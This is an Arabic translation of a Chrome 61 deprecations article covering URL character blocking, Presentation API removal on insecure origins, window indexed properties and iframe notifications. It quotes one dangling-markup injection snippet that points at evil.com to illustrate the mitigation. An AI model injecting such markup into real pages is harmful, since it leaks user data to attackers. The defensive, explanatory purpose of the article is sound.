في كل إصدار تقريبًا من Chrome، نشهد عددًا كبيرًا من التحديثات والتحسينات للمنتج وأدائه وإمكانات "منصة الويب" أيضًا. توضّح هذه المقالة عمليات الإيقاف النهائي وعمليات الإزالة في الإصدار 61 من Chrome، الذي يتوفَّر في إصدار تجريبي اعتبارًا من 3 آب (أغسطس). تخضع هذه القائمة للتغيير في أي وقت.
الأمان والخصوصية
حظر الموارد التي تحتوي عناوين URL الخاصة بها على الحرفين '\n' و '<'
وهناك نوع من الاختراق يُسمى إدخال الترميز المتدلٍ يتم فيه استخدام عنوان URL مقتطع لإرسال البيانات إلى نقطة نهاية خارجية. على سبيل المثال، يمكنك استخدام صفحة تحتوي على <img src='https://evil.com/?. ونظرًا لأن عنوان URL لا يحتوي على علامة اقتباس ختامية، ستقرأ المتصفحات إلى الاقتباس التالي الذي يحدث وتتعامل مع الأحرف المغلقة كما لو كانت عنوان URL واحدًا.
ويحدّ إصدار 61 من Chrome من هذه الثغرة الأمنية من خلال حظر مجموعات الأحرف المسموح بها في سمتَي href وsrc. وعلى وجه التحديد، سيتوقّف Chrome عن معالجة عناوين URL عند ظهور أحرف سطر جديدة (\n) وأقل من
أحرف (<).
وبدلاً من ذلك، على المطوّرين الذين لديهم حالة استخدام شرعية للسطر الجديد وأقل من عدد الأحرف في عنوان URL إلغاء هذه الأحرف.
هدف الإزالة | Chromestatus Tracker | خطأ Chromium
إيقاف وإزالة واجهة برمجة تطبيقات العرض التقديمي في السياقات غير الآمنة
وقد تبين أنه في الأصول غير الآمنة، يمكن استخدام واجهة برمجة تطبيقات العرض التقديمي كمتجهات اختراق في الأصول غير الآمنة. نظرًا لأن الشاشات لا تحتوي على أشرطة عناوين، يمكن استخدام واجهة برمجة التطبيقات لانتحال المحتوى. من الممكن أيضًا استخراج البيانات من إجراء العرض التقديمي.
تماشيًا مع نية Blink في إزالة الميزات الفعّالة على المصادر غير الآمنة، نخطط لإيقاف الدعم المُقدَّم من واجهة برمجة التطبيقات Presentation API للسياقات غير الآمنة نهائيًا. بدءًا من الإصدار 61 من Chrome،
لن يعمل PresentationRequest.start() على المصادر غير الآمنة.
هدف الإزالة | Chromestatus Tracker | خطأ Chromium
JavaScript
عدم السماح بتحديد السمات المفهرَسة في النوافذ
في السابق، كانت بعض المتصفحات تسمح بتشغيل مهام JavaScript كما يلي:
window[0] = 1;
ملاحظات مواصفات HTML الحالية أنّ هذا الإجراء ينتهك بشكل صريح مواصفات JavaScript، وبالتالي، تتم إزالة هذه الإمكانية في الإصدار Chrome 61. بدايةً من شباط (فبراير) 2016، سيلتزم فايرفوكس بالفعل.
إزالة استخدام الإشعارات من إطارات iframe غير الآمنة
يمكن أن تؤدي طلبات الأذونات من إطارات iframe إلى إرباك المستخدمين، لأنّه من الصعب التمييز بين أصل الصفحة التي تتضمن المحتوى وأصل إطار iframe الذي ينفِّذ الطلب. عندما يكون نطاق الطلبات غير واضح، يصعب على المستخدمين الحكم على منح الإذن أو رفضه.
سيؤدي عدم السماح بالإشعارات في إطارات iframe أيضًا إلى مواءمة متطلبات إذن إرسال الإشعارات مع متطلبات إذن الإشعارات الفورية، ما يخفف على حدة الصعوبات التي يواجهها المطوّرون.
ويمكن للمطوّرين الذين يحتاجون إلى هذه الوظيفة فتح نافذة جديدة لطلب إذن إرسال الإشعارات.